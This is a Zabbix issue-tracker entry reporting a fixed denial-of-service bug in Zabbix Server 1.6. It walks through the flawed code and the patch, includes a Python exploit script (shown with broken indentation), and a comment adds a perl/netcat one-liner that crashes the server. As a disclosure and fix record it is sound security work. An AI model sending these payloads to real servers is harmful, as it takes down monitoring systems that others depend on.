ZABBIX BUGS AND ISSUES

DoS in Zabbix Server

Details

  • Type: Bug Bug
  • Status: Closed Closed
  • Priority: Critical Critical
  • Resolution: Fixed
  • Affects Version/s: 1.6
  • Fix Version/s: 1.6
  • Component/s: Proxy (P), Server (S)
  • Labels:
    None
  • Environment:
    Zabbix server v1.6.x
  • Zabbix ID:
    NA

Description

While reading Zabbix source code, I found a small error leading to an
easy to exploit denial of service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).

In src/zabbix_server/trapper/trapper.c, function process_trap() :

# Make a truncated to 2047 copy of "s"
strscpy(copy,s);

# Check if there's some ":" in "s" (and not in "copy" !)
server=(char *)strtok(s,":");

[...]

# Look for the 1st ":" in "copy"
value_string=strchr(copy,':');

# If 1st ":" in "s" if after offset 2047
# we got a null ptr deference crash
value_string=strchr(value_string+1,':');

The patch is trivial : just use "copy" instead of "s" in your check.

server=(char *)strtok(copy,":");

Exploit code :

8<-----------------------------------------------------------------
#!/usr/bin/python

PORT = 10051
HOST = "192.168.2.89"

import socket
import struct

try:
        socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.settimeout(3)
        socket.connect((HOST, PORT))

        header = 'ZBXD\x01'

# DoS in ./src/zabbix_server/trapper/trapper.c
# If first ":" is after 2047 => DoS when reading NULL+1
data = 'A'*2050 + ':B'

size = struct.pack('q', len(data))
socket.send(header + size + data)
        rcvdata = socket.recv(10240)
print rcvdata
except:
        print "FAIL"

socket.close()
8<-----------------------------------------------------------------

Activity

Hide
Alexander Vladishev added a comment -

Fixed in version pre1.6.6, rev. 7690.

Show
Alexander Vladishev added a comment - Fixed in version pre1.6.6, rev. 7690.
Hide
richlv added a comment -

closing all resolved issues

Show
richlv added a comment - closing all resolved issues
Hide
Rafael Gomes added a comment -

I got this error with exploit:

File "166.pl", line 18
data = 'A'*2050 + ':B'
^
SyntaxError: invalid syntax

My Zabbix server 1.6.4 was compiled from source.

My version is affected too?

Show
Rafael Gomes added a comment - I got this error with exploit: File "166.pl", line 18 data = 'A'*2050 + ':B' ^ SyntaxError: invalid syntax My Zabbix server 1.6.4 was compiled from source. My version is affected too?
Hide
richlv added a comment -

ad the original comment said, it should be fixed in 1.6.6

ZBX-993#action_16403

Show
richlv added a comment - ad the original comment said, it should be fixed in 1.6.6 ZBX-993#action_16403
Hide
richlv added a comment -
Show
richlv added a comment - let's try full link then... https://support.zabbix.com/browse/ZBX-993#action_16403
Hide
Rafael Gomes added a comment -

I just wanna know if my version is affected, because I can't exploit with this code.

Show
Rafael Gomes added a comment - I just wanna know if my version is affected, because I can't exploit with this code.
Hide
Nicob added a comment -

Indentation of the provided exploit code is broken.

Version 1.6.4 (even from source) is affected, but you may try the following PoC :
perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

Show
Nicob added a comment - Indentation of the provided exploit code is broken. Version 1.6.4 (even from source) is affected, but you may try the following PoC : perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051
Hide
Rafael Gomes added a comment -

Hi Nicob,

Thanks for you help, but I can't exploit it yet.

When I put your code in server, I didn't get anything and my server still running

Show
Rafael Gomes added a comment - Hi Nicob, Thanks for you help, but I can't exploit it yet. When I put your code in server, I didn't get anything and my server still running

People

Vote (0)
Watch (2)

Dates

  • Created:
    Updated:
    Resolved: